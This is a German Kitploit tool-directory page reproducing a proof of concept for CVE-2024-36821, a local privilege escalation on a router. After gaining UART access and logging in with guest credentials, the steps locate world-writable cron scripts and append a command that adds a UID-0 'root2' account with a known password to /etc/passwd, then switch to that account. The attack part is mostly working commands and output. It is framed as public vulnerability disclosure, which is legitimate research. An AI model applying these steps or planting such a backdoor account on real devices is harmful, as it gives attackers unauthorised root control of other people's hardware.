Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36821 — Die öffentliche Referenz, die die Mindestinformationen für die durch CVE-2024-36821 abgedeckte Schwachstelle enthält. | Kitploit
Tools/GitHubGitHub/ivanglinkin/cve-2024-36821
Embedded-System-SicherheitPrivilege EscalationSchwachstellenanalyseExploitationPenetrationstestsHardware- & IoT-Sicherheit
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

Die öffentliche Referenz, die die Mindestinformationen für die durch CVE-2024-36821 abgedeckte Schwachstelle enthält.

Repository anzeigen
3vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-36821

Die öffentliche Referenz, die die Mindestinformationen für die durch CVE-2024-36821 abgedeckte Schwachstelle enthält

Das Originalvideo mit PoC finden Sie unter -> https://www.youtube.com/watch?v=6vHno0ik7JY

Der PoC:

  1. Verbinden Sie sich mit dem Router über eine UART-Verbindung

  2. Verwenden Sie die Anmeldeinformationen guest:guest, um sich im System anzumelden

  3. Verwenden Sie den Befehl find / -perm -777 -type f 2>/dev/null, um Dateien mit Lese-Schreib-Ausführungsberechtigungen zu finden:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 um 20:00:50
  4. Überprüfen Sie den Besitzer mit dem Befehl ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. Generieren Sie das Passwort mit dem Befehl openssl passwd Abracadabra

  6. Bearbeiten Sie /tmp/cron/cron.everyminute/conntrack_collector.sh und fügen Sie am Ende das neu generierte Passwort hinzu:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 um 20:05:05
  7. Warten Sie eine Minute

  8. Wechseln Sie mit dem folgenden Befehl zum Benutzer root2:

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
Tool herunterladen